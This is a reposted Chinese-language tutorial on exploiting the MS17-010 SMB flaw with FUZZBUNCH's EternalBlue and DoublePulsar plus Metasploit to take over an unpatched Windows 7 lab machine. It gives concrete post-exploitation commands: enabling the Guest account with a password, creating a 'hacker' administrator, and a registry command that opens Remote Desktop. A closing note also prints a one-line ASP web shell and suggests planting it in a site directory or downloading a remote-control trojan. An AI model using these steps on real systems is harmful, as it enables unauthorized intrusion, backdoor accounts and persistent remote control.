ms17-010漏洞利用教程


ms17-010 漏洞利用並拿下服務器教程

 

攻擊環境:

攻擊機win2003

ip:192.168.150.129

Window2003 Python環境及工具

攻擊機kali:

ip:192.168.150.128

目標主機window7 x64(未裝smb 漏洞補丁)

ip:192.168.150.131

 

演示操作

第一步:在攻擊機Window2003 上進行如下操作

安裝以下python工具(32位或64位)並配置系統環境變量

解壓C盤

注意,所有環境安裝配置好之后,我們在FUZZBUNCH目錄下以CMD形式執行python fb.py命令,將會提示未找到“Listening post”錯誤,原因在於指定運行配置屬性為空,所以,我們可以用編輯器把fb.py源碼的第72行“Listening post”相關部分注釋掉:

另外,在相同目錄下找到Fuzzbunch.xml文件,用我們本地系統相關路徑把其中的第19行和第24行路徑進行覆蓋,如下圖所示:

FUZZBUNCH可以正常運行:

FUZZBUNCH的初始化過程中,將會需要輸入攻擊目標IP(win7)和回連控制IP(kali),如下圖所示:

EternalBlue攻擊並入侵Windows 7/2008

其它配置默認即可(可以直接更改)

 

再次確定參數

開啟攻擊,並看到Success

 

第二步:在另一台攻擊機Kali上進行如下操作

1) Kali內生成一個Dll劫持文件。

2) 生成的ms17.dll放在Window 2003的C盤內,即C:\ms17.dll

 

3) 開啟並配置msf

 

 

4)攻擊:exploit 並等待反鏈接

 

 

第三步:攻擊機Window2003上操作

1) use Doublepulsar

 

 

2) 默認配置即可

 

   

3) 攻擊成功

 

 

 

第四步:在Kali上控制靶機(win7)

1)在Kali上成功獲取會話,可以進行任意操作

 

 

3) 獲取一個shell

 

 

4)查看當前權限

 

 

(可以激活Guest用戶輸入命令

net user guest /active:yes

添加密碼net user guest 123.com)

5)創建用戶hacker並加入管理員組

 

 

6)查看開放端口

 

 

 

 

 

7)開啟3389端口(win7)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

 

8)3389開啟成功

 

 

9)遠程桌面連接

 

 

用剛才創建的hacker賬戶登錄

 

 

登錄成功

 

 

注:

溢出后也不一定要非要在cmdshell下開啟遠程桌面服務;可以echo一個vbs文件,下載遠程控制木馬,然后在cmdshell里運行一下木馬即可連接;還有就是查詢目標IP是否綁定有網站,如果有則找到網站目錄,再用echo個一句話木馬進去(命令是:echo "<%execute request("cmd")%>" > WEB路徑/123.asp),用中國年菜刀連接,然后上傳大馬,或者上傳開3389的工具再開啟也行。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM